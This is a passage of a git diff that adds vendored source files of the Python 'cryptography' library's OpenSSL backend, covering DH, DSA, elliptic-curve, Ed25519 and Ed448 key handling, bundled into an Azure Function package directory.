self._backend.openssl_assert(res == 1) + evp_pkey = self._backend._dh_cdata_to_evp_pkey(dh_cdata) + return _DHPublicKey(self._backend, dh_cdata, evp_pkey) + + def parameters(self) -> dh.DHParameters: + return _dh_cdata_to_parameters(self._dh_cdata, self._backend) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + if format is not serialization.PrivateFormat.PKCS8: + raise ValueError( + "DH private keys support only PKCS8 serialization" + ) + if not self._backend._lib.Cryptography_HAS_EVP_PKEY_DHX: + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg( + self._dh_cdata, + self._backend._ffi.NULL, + q, + self._backend._ffi.NULL, + ) + if q[0] != self._backend._ffi.NULL: + raise UnsupportedAlgorithm( + "DH X9.42 serialization is not supported", + _Reasons.UNSUPPORTED_SERIALIZATION, + ) + + return self._backend._private_key_bytes( + encoding, + format, + encryption_algorithm, + self, + self._evp_pkey, + self._dh_cdata, + ) + + +class _DHPublicKey(dh.DHPublicKey): + def __init__(self, backend: "Backend", dh_cdata, evp_pkey): + self._backend = backend + self._dh_cdata = dh_cdata + self._evp_pkey = evp_pkey + self._key_size_bits = _get_dh_num_bits(self._backend, self._dh_cdata) + + @property + def key_size(self) -> int: + return self._key_size_bits + + def public_numbers(self) -> dh.DHPublicNumbers: + p = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg(self._dh_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + if q[0] == self._backend._ffi.NULL: + q_val = None + else: + q_val = self._backend._bn_to_int(q[0]) + pub_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_key( + self._dh_cdata, pub_key, self._backend._ffi.NULL + ) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + return dh.DHPublicNumbers( + parameter_numbers=dh.DHParameterNumbers( + p=self._backend._bn_to_int(p[0]), + g=self._backend._bn_to_int(g[0]), + q=q_val, + ), + 
y=self._backend._bn_to_int(pub_key[0]), + ) + + def parameters(self) -> dh.DHParameters: + return _dh_cdata_to_parameters(self._dh_cdata, self._backend) + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if format is not serialization.PublicFormat.SubjectPublicKeyInfo: + raise ValueError( + "DH public keys support only " + "SubjectPublicKeyInfo serialization" + ) + + if not self._backend._lib.Cryptography_HAS_EVP_PKEY_DHX: + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg( + self._dh_cdata, + self._backend._ffi.NULL, + q, + self._backend._ffi.NULL, + ) + if q[0] != self._backend._ffi.NULL: + raise UnsupportedAlgorithm( + "DH X9.42 serialization is not supported", + _Reasons.UNSUPPORTED_SERIALIZATION, + ) + + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dsa.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dsa.py new file mode 100644 index 0000000..1c212f0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dsa.py @@ -0,0 +1,239 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography.exceptions import InvalidSignature +from cryptography.hazmat.backends.openssl.utils import ( + _calculate_digest_and_algorithm, +) +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives.asymmetric import ( + dsa, + utils as asym_utils, +) + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +def _dsa_sig_sign( + backend: "Backend", private_key: "_DSAPrivateKey", data: bytes +) -> bytes: + sig_buf_len = backend._lib.DSA_size(private_key._dsa_cdata) + sig_buf = backend._ffi.new("unsigned char[]", sig_buf_len) + buflen = backend._ffi.new("unsigned int *") + + # The first parameter passed to DSA_sign is unused by OpenSSL but + # must be an integer. + res = backend._lib.DSA_sign( + 0, data, len(data), sig_buf, buflen, private_key._dsa_cdata + ) + backend.openssl_assert(res == 1) + backend.openssl_assert(buflen[0]) + + return backend._ffi.buffer(sig_buf)[: buflen[0]] + + +def _dsa_sig_verify( + backend: "Backend", + public_key: "_DSAPublicKey", + signature: bytes, + data: bytes, +) -> None: + # The first parameter passed to DSA_verify is unused by OpenSSL but + # must be an integer. 
+ res = backend._lib.DSA_verify( + 0, data, len(data), signature, len(signature), public_key._dsa_cdata + ) + + if res != 1: + backend._consume_errors() + raise InvalidSignature + + +class _DSAParameters(dsa.DSAParameters): + def __init__(self, backend: "Backend", dsa_cdata): + self._backend = backend + self._dsa_cdata = dsa_cdata + + def parameter_numbers(self) -> dsa.DSAParameterNumbers: + p = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_pqg(self._dsa_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(q[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + return dsa.DSAParameterNumbers( + p=self._backend._bn_to_int(p[0]), + q=self._backend._bn_to_int(q[0]), + g=self._backend._bn_to_int(g[0]), + ) + + def generate_private_key(self) -> dsa.DSAPrivateKey: + return self._backend.generate_dsa_private_key(self) + + +class _DSAPrivateKey(dsa.DSAPrivateKey): + _key_size: int + + def __init__(self, backend: "Backend", dsa_cdata, evp_pkey): + self._backend = backend + self._dsa_cdata = dsa_cdata + self._evp_pkey = evp_pkey + + p = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_pqg( + dsa_cdata, p, self._backend._ffi.NULL, self._backend._ffi.NULL + ) + self._backend.openssl_assert(p[0] != backend._ffi.NULL) + self._key_size = self._backend._lib.BN_num_bits(p[0]) + + @property + def key_size(self) -> int: + return self._key_size + + def private_numbers(self) -> dsa.DSAPrivateNumbers: + p = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + pub_key = self._backend._ffi.new("BIGNUM **") + priv_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_pqg(self._dsa_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(q[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + self._backend._lib.DSA_get0_key(self._dsa_cdata, pub_key, priv_key) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(priv_key[0] != self._backend._ffi.NULL) + return dsa.DSAPrivateNumbers( + public_numbers=dsa.DSAPublicNumbers( + parameter_numbers=dsa.DSAParameterNumbers( + p=self._backend._bn_to_int(p[0]), + q=self._backend._bn_to_int(q[0]), + g=self._backend._bn_to_int(g[0]), + ), + y=self._backend._bn_to_int(pub_key[0]), + ), + x=self._backend._bn_to_int(priv_key[0]), + ) + + def public_key(self) -> dsa.DSAPublicKey: + dsa_cdata = self._backend._lib.DSAparams_dup(self._dsa_cdata) + self._backend.openssl_assert(dsa_cdata != self._backend._ffi.NULL) + dsa_cdata = self._backend._ffi.gc( + dsa_cdata, self._backend._lib.DSA_free + ) + pub_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_key( + self._dsa_cdata, pub_key, self._backend._ffi.NULL + ) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + pub_key_dup = self._backend._lib.BN_dup(pub_key[0]) + res = self._backend._lib.DSA_set0_key( + dsa_cdata, pub_key_dup, self._backend._ffi.NULL + ) + self._backend.openssl_assert(res == 1) + evp_pkey = self._backend._dsa_cdata_to_evp_pkey(dsa_cdata) + return _DSAPublicKey(self._backend, dsa_cdata, evp_pkey) + + def parameters(self) -> dsa.DSAParameters: + dsa_cdata = self._backend._lib.DSAparams_dup(self._dsa_cdata) + 
self._backend.openssl_assert(dsa_cdata != self._backend._ffi.NULL) + dsa_cdata = self._backend._ffi.gc( + dsa_cdata, self._backend._lib.DSA_free + ) + return _DSAParameters(self._backend, dsa_cdata) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + return self._backend._private_key_bytes( + encoding, + format, + encryption_algorithm, + self, + self._evp_pkey, + self._dsa_cdata, + ) + + def sign( + self, + data: bytes, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> bytes: + data, _ = _calculate_digest_and_algorithm(data, algorithm) + return _dsa_sig_sign(self._backend, self, data) + + +class _DSAPublicKey(dsa.DSAPublicKey): + _key_size: int + + def __init__(self, backend: "Backend", dsa_cdata, evp_pkey): + self._backend = backend + self._dsa_cdata = dsa_cdata + self._evp_pkey = evp_pkey + p = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_pqg( + dsa_cdata, p, self._backend._ffi.NULL, self._backend._ffi.NULL + ) + self._backend.openssl_assert(p[0] != backend._ffi.NULL) + self._key_size = self._backend._lib.BN_num_bits(p[0]) + + @property + def key_size(self) -> int: + return self._key_size + + def public_numbers(self) -> dsa.DSAPublicNumbers: + p = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + pub_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_pqg(self._dsa_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(q[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + self._backend._lib.DSA_get0_key( + self._dsa_cdata, pub_key, self._backend._ffi.NULL + ) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + return dsa.DSAPublicNumbers( + parameter_numbers=dsa.DSAParameterNumbers( + p=self._backend._bn_to_int(p[0]), + q=self._backend._bn_to_int(q[0]), + g=self._backend._bn_to_int(g[0]), + ), + y=self._backend._bn_to_int(pub_key[0]), + ) + + def parameters(self) -> dsa.DSAParameters: + dsa_cdata = self._backend._lib.DSAparams_dup(self._dsa_cdata) + dsa_cdata = self._backend._ffi.gc( + dsa_cdata, self._backend._lib.DSA_free + ) + return _DSAParameters(self._backend, dsa_cdata) + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def verify( + self, + signature: bytes, + data: bytes, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> None: + data, _ = _calculate_digest_and_algorithm(data, algorithm) + return _dsa_sig_verify(self._backend, self, signature, data) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ec.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ec.py new file mode 100644 index 0000000..bc095cb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ec.py @@ -0,0 +1,315 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
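_dsa_sig_sign and _dsa_sig_verify above receive an already-computed digest via _calculate_digest_and_algorithm, which is why asym_utils.Prehashed is accepted alongside a hash algorithm. A minimal sketch of both call styles through the public API:

    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import dsa, utils

    private_key = dsa.generate_private_key(key_size=2048)
    signature = private_key.sign(b"data", hashes.SHA256())
    # verify raises InvalidSignature on failure, returns None on success.
    private_key.public_key().verify(signature, b"data", hashes.SHA256())

    # Prehashed variant: hash once yourself, then pass the digest through.
    h = hashes.Hash(hashes.SHA256())
    h.update(b"data")
    sig2 = private_key.sign(h.finalize(), utils.Prehashed(hashes.SHA256()))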
+ +import typing + +from cryptography.exceptions import ( + InvalidSignature, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.backends.openssl.utils import ( + _calculate_digest_and_algorithm, + _evp_pkey_derive, +) +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric import ec + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +def _check_signature_algorithm( + signature_algorithm: ec.EllipticCurveSignatureAlgorithm, +) -> None: + if not isinstance(signature_algorithm, ec.ECDSA): + raise UnsupportedAlgorithm( + "Unsupported elliptic curve signature algorithm.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + +def _ec_key_curve_sn(backend: "Backend", ec_key) -> str: + group = backend._lib.EC_KEY_get0_group(ec_key) + backend.openssl_assert(group != backend._ffi.NULL) + + nid = backend._lib.EC_GROUP_get_curve_name(group) + # The following check is to find EC keys with unnamed curves and raise + # an error for now. + if nid == backend._lib.NID_undef: + raise ValueError( + "ECDSA keys with explicit parameters are unsupported at this time" + ) + + # This is like the above check, but it also catches the case where you + # explicitly encoded a curve with the same parameters as a named curve. + # Don't do that. + if ( + not backend._lib.CRYPTOGRAPHY_IS_LIBRESSL + and backend._lib.EC_GROUP_get_asn1_flag(group) == 0 + ): + raise ValueError( + "ECDSA keys with explicit parameters are unsupported at this time" + ) + + curve_name = backend._lib.OBJ_nid2sn(nid) + backend.openssl_assert(curve_name != backend._ffi.NULL) + + sn = backend._ffi.string(curve_name).decode("ascii") + return sn + + +def _mark_asn1_named_ec_curve(backend: "Backend", ec_cdata): + """ + Set the named curve flag on the EC_KEY. This causes OpenSSL to + serialize EC keys along with their curve OID which makes + deserialization easier. 
+ """ + + backend._lib.EC_KEY_set_asn1_flag( + ec_cdata, backend._lib.OPENSSL_EC_NAMED_CURVE + ) + + +def _check_key_infinity(backend: "Backend", ec_cdata) -> None: + point = backend._lib.EC_KEY_get0_public_key(ec_cdata) + backend.openssl_assert(point != backend._ffi.NULL) + group = backend._lib.EC_KEY_get0_group(ec_cdata) + backend.openssl_assert(group != backend._ffi.NULL) + if backend._lib.EC_POINT_is_at_infinity(group, point): + raise ValueError( + "Cannot load an EC public key where the point is at infinity" + ) + + +def _sn_to_elliptic_curve(backend: "Backend", sn: str) -> ec.EllipticCurve: + try: + return ec._CURVE_TYPES[sn]() + except KeyError: + raise UnsupportedAlgorithm( + "{} is not a supported elliptic curve".format(sn), + _Reasons.UNSUPPORTED_ELLIPTIC_CURVE, + ) + + +def _ecdsa_sig_sign( + backend: "Backend", private_key: "_EllipticCurvePrivateKey", data: bytes +) -> bytes: + max_size = backend._lib.ECDSA_size(private_key._ec_key) + backend.openssl_assert(max_size > 0) + + sigbuf = backend._ffi.new("unsigned char[]", max_size) + siglen_ptr = backend._ffi.new("unsigned int[]", 1) + res = backend._lib.ECDSA_sign( + 0, data, len(data), sigbuf, siglen_ptr, private_key._ec_key + ) + backend.openssl_assert(res == 1) + return backend._ffi.buffer(sigbuf)[: siglen_ptr[0]] + + +def _ecdsa_sig_verify( + backend: "Backend", + public_key: "_EllipticCurvePublicKey", + signature: bytes, + data: bytes, +) -> None: + res = backend._lib.ECDSA_verify( + 0, data, len(data), signature, len(signature), public_key._ec_key + ) + if res != 1: + backend._consume_errors() + raise InvalidSignature + + +class _EllipticCurvePrivateKey(ec.EllipticCurvePrivateKey): + def __init__(self, backend: "Backend", ec_key_cdata, evp_pkey): + self._backend = backend + self._ec_key = ec_key_cdata + self._evp_pkey = evp_pkey + + sn = _ec_key_curve_sn(backend, ec_key_cdata) + self._curve = _sn_to_elliptic_curve(backend, sn) + _mark_asn1_named_ec_curve(backend, ec_key_cdata) + _check_key_infinity(backend, ec_key_cdata) + + @property + def curve(self) -> ec.EllipticCurve: + return self._curve + + @property + def key_size(self) -> int: + return self.curve.key_size + + def exchange( + self, algorithm: ec.ECDH, peer_public_key: ec.EllipticCurvePublicKey + ) -> bytes: + if not ( + self._backend.elliptic_curve_exchange_algorithm_supported( + algorithm, self.curve + ) + ): + raise UnsupportedAlgorithm( + "This backend does not support the ECDH algorithm.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + + if peer_public_key.curve.name != self.curve.name: + raise ValueError( + "peer_public_key and self are not on the same curve" + ) + + return _evp_pkey_derive(self._backend, self._evp_pkey, peer_public_key) + + def public_key(self) -> ec.EllipticCurvePublicKey: + group = self._backend._lib.EC_KEY_get0_group(self._ec_key) + self._backend.openssl_assert(group != self._backend._ffi.NULL) + + curve_nid = self._backend._lib.EC_GROUP_get_curve_name(group) + public_ec_key = self._backend._ec_key_new_by_curve_nid(curve_nid) + + point = self._backend._lib.EC_KEY_get0_public_key(self._ec_key) + self._backend.openssl_assert(point != self._backend._ffi.NULL) + + res = self._backend._lib.EC_KEY_set_public_key(public_ec_key, point) + self._backend.openssl_assert(res == 1) + + evp_pkey = self._backend._ec_cdata_to_evp_pkey(public_ec_key) + + return _EllipticCurvePublicKey(self._backend, public_ec_key, evp_pkey) + + def private_numbers(self) -> ec.EllipticCurvePrivateNumbers: + bn = self._backend._lib.EC_KEY_get0_private_key(self._ec_key) + 
private_value = self._backend._bn_to_int(bn) + return ec.EllipticCurvePrivateNumbers( + private_value=private_value, + public_numbers=self.public_key().public_numbers(), + ) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + return self._backend._private_key_bytes( + encoding, + format, + encryption_algorithm, + self, + self._evp_pkey, + self._ec_key, + ) + + def sign( + self, + data: bytes, + signature_algorithm: ec.EllipticCurveSignatureAlgorithm, + ) -> bytes: + _check_signature_algorithm(signature_algorithm) + data, _ = _calculate_digest_and_algorithm( + data, + signature_algorithm.algorithm, + ) + return _ecdsa_sig_sign(self._backend, self, data) + + +class _EllipticCurvePublicKey(ec.EllipticCurvePublicKey): + def __init__(self, backend: "Backend", ec_key_cdata, evp_pkey): + self._backend = backend + self._ec_key = ec_key_cdata + self._evp_pkey = evp_pkey + + sn = _ec_key_curve_sn(backend, ec_key_cdata) + self._curve = _sn_to_elliptic_curve(backend, sn) + _mark_asn1_named_ec_curve(backend, ec_key_cdata) + _check_key_infinity(backend, ec_key_cdata) + + @property + def curve(self) -> ec.EllipticCurve: + return self._curve + + @property + def key_size(self) -> int: + return self.curve.key_size + + def public_numbers(self) -> ec.EllipticCurvePublicNumbers: + get_func, group = self._backend._ec_key_determine_group_get_func( + self._ec_key + ) + point = self._backend._lib.EC_KEY_get0_public_key(self._ec_key) + self._backend.openssl_assert(point != self._backend._ffi.NULL) + + with self._backend._tmp_bn_ctx() as bn_ctx: + bn_x = self._backend._lib.BN_CTX_get(bn_ctx) + bn_y = self._backend._lib.BN_CTX_get(bn_ctx) + + res = get_func(group, point, bn_x, bn_y, bn_ctx) + self._backend.openssl_assert(res == 1) + + x = self._backend._bn_to_int(bn_x) + y = self._backend._bn_to_int(bn_y) + + return ec.EllipticCurvePublicNumbers(x=x, y=y, curve=self._curve) + + def _encode_point(self, format: serialization.PublicFormat) -> bytes: + if format is serialization.PublicFormat.CompressedPoint: + conversion = self._backend._lib.POINT_CONVERSION_COMPRESSED + else: + assert format is serialization.PublicFormat.UncompressedPoint + conversion = self._backend._lib.POINT_CONVERSION_UNCOMPRESSED + + group = self._backend._lib.EC_KEY_get0_group(self._ec_key) + self._backend.openssl_assert(group != self._backend._ffi.NULL) + point = self._backend._lib.EC_KEY_get0_public_key(self._ec_key) + self._backend.openssl_assert(point != self._backend._ffi.NULL) + with self._backend._tmp_bn_ctx() as bn_ctx: + buflen = self._backend._lib.EC_POINT_point2oct( + group, point, conversion, self._backend._ffi.NULL, 0, bn_ctx + ) + self._backend.openssl_assert(buflen > 0) + buf = self._backend._ffi.new("char[]", buflen) + res = self._backend._lib.EC_POINT_point2oct( + group, point, conversion, buf, buflen, bn_ctx + ) + self._backend.openssl_assert(buflen == res) + + return self._backend._ffi.buffer(buf)[:] + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if ( + encoding is serialization.Encoding.X962 + or format is serialization.PublicFormat.CompressedPoint + or format is serialization.PublicFormat.UncompressedPoint + ): + if encoding is not serialization.Encoding.X962 or format not in ( + serialization.PublicFormat.CompressedPoint, + serialization.PublicFormat.UncompressedPoint, + ): + raise ValueError( + "X962 encoding must be 
used with CompressedPoint or " + "UncompressedPoint format" + ) + + return self._encode_point(format) + else: + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def verify( + self, + signature: bytes, + data: bytes, + signature_algorithm: ec.EllipticCurveSignatureAlgorithm, + ) -> None: + _check_signature_algorithm(signature_algorithm) + data, _ = _calculate_digest_and_algorithm( + data, + signature_algorithm.algorithm, + ) + _ecdsa_sig_verify(self._backend, self, signature, data) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed25519.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed25519.py new file mode 100644 index 0000000..401d78d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed25519.py @@ -0,0 +1,155 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography import exceptions +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric.ed25519 import ( + Ed25519PrivateKey, + Ed25519PublicKey, + _ED25519_KEY_SIZE, + _ED25519_SIG_SIZE, +) + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _Ed25519PublicKey(Ed25519PublicKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + encoding is not serialization.Encoding.Raw + or format is not serialization.PublicFormat.Raw + ): + raise ValueError( + "When using Raw both encoding and format must be Raw" + ) + + return self._raw_public_bytes() + + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def _raw_public_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _ED25519_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED25519_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED25519_KEY_SIZE) + return self._backend._ffi.buffer(buf, _ED25519_KEY_SIZE)[:] + + def verify(self, signature: bytes, data: bytes) -> None: + evp_md_ctx = self._backend._lib.EVP_MD_CTX_new() + self._backend.openssl_assert(evp_md_ctx != self._backend._ffi.NULL) + evp_md_ctx = self._backend._ffi.gc( + evp_md_ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_DigestVerifyInit( + evp_md_ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._evp_pkey, + ) + self._backend.openssl_assert(res == 1) + res = self._backend._lib.EVP_DigestVerify( + evp_md_ctx, signature, len(signature), data, len(data) + ) + if res != 1: + self._backend._consume_errors() + raise exceptions.InvalidSignature + + +class _Ed25519PrivateKey(Ed25519PrivateKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_key(self) -> 
Ed25519PublicKey: + buf = self._backend._ffi.new("unsigned char []", _ED25519_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED25519_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED25519_KEY_SIZE) + public_bytes = self._backend._ffi.buffer(buf)[:] + return self._backend.ed25519_load_public_bytes(public_bytes) + + def sign(self, data: bytes) -> bytes: + evp_md_ctx = self._backend._lib.EVP_MD_CTX_new() + self._backend.openssl_assert(evp_md_ctx != self._backend._ffi.NULL) + evp_md_ctx = self._backend._ffi.gc( + evp_md_ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_DigestSignInit( + evp_md_ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._evp_pkey, + ) + self._backend.openssl_assert(res == 1) + buf = self._backend._ffi.new("unsigned char[]", _ED25519_SIG_SIZE) + buflen = self._backend._ffi.new("size_t *", len(buf)) + res = self._backend._lib.EVP_DigestSign( + evp_md_ctx, buf, buflen, data, len(data) + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED25519_SIG_SIZE) + return self._backend._ffi.buffer(buf, buflen[0])[:] + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + format is not serialization.PrivateFormat.Raw + or encoding is not serialization.Encoding.Raw + or not isinstance( + encryption_algorithm, serialization.NoEncryption + ) + ): + raise ValueError( + "When using Raw both encoding and format must be Raw " + "and encryption_algorithm must be NoEncryption()" + ) + + return self._raw_private_bytes() + + return self._backend._private_key_bytes( + encoding, format, encryption_algorithm, self, self._evp_pkey, None + ) + + def _raw_private_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _ED25519_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED25519_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_private_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED25519_KEY_SIZE) + return self._backend._ffi.buffer(buf, _ED25519_KEY_SIZE)[:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed448.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed448.py new file mode 100644 index 0000000..1db2c14 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed448.py @@ -0,0 +1,156 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
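The Raw-encoding checks in _Ed25519PrivateKey.private_bytes above require encoding, format, and NoEncryption to all line up before the 32-byte seed is exported. A minimal sketch of signing and raw export through the public API:

    from cryptography.hazmat.primitives import serialization
    from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

    key = Ed25519PrivateKey.generate()
    sig = key.sign(b"payload")  # 64 bytes (_ED25519_SIG_SIZE)
    key.public_key().verify(sig, b"payload")  # raises InvalidSignature on mismatch

    raw = key.private_bytes(
        serialization.Encoding.Raw,
        serialization.PrivateFormat.Raw,
        serialization.NoEncryption(),
    )
    assert len(raw) == 32  # _ED25519_KEY_SIZE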
+ +import typing + +from cryptography import exceptions +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric.ed448 import ( + Ed448PrivateKey, + Ed448PublicKey, +) + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + +_ED448_KEY_SIZE = 57 +_ED448_SIG_SIZE = 114 + + +class _Ed448PublicKey(Ed448PublicKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + encoding is not serialization.Encoding.Raw + or format is not serialization.PublicFormat.Raw + ): + raise ValueError( + "When using Raw both encoding and format must be Raw" + ) + + return self._raw_public_bytes() + + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def _raw_public_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _ED448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED448_KEY_SIZE) + return self._backend._ffi.buffer(buf, _ED448_KEY_SIZE)[:] + + def verify(self, signature: bytes, data: bytes) -> None: + evp_md_ctx = self._backend._lib.EVP_MD_CTX_new() + self._backend.openssl_assert(evp_md_ctx != self._backend._ffi.NULL) + evp_md_ctx = self._backend._ffi.gc( + evp_md_ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_DigestVerifyInit( + evp_md_ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._evp_pkey, + ) + self._backend.openssl_assert(res == 1) + res = self._backend._lib.EVP_DigestVerify( + evp_md_ctx, signature, len(signature), data, len(data) + ) + if res != 1: + self._backend._consume_errors() + raise exceptions.InvalidSignature + + +class _Ed448PrivateKey(Ed448PrivateKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = 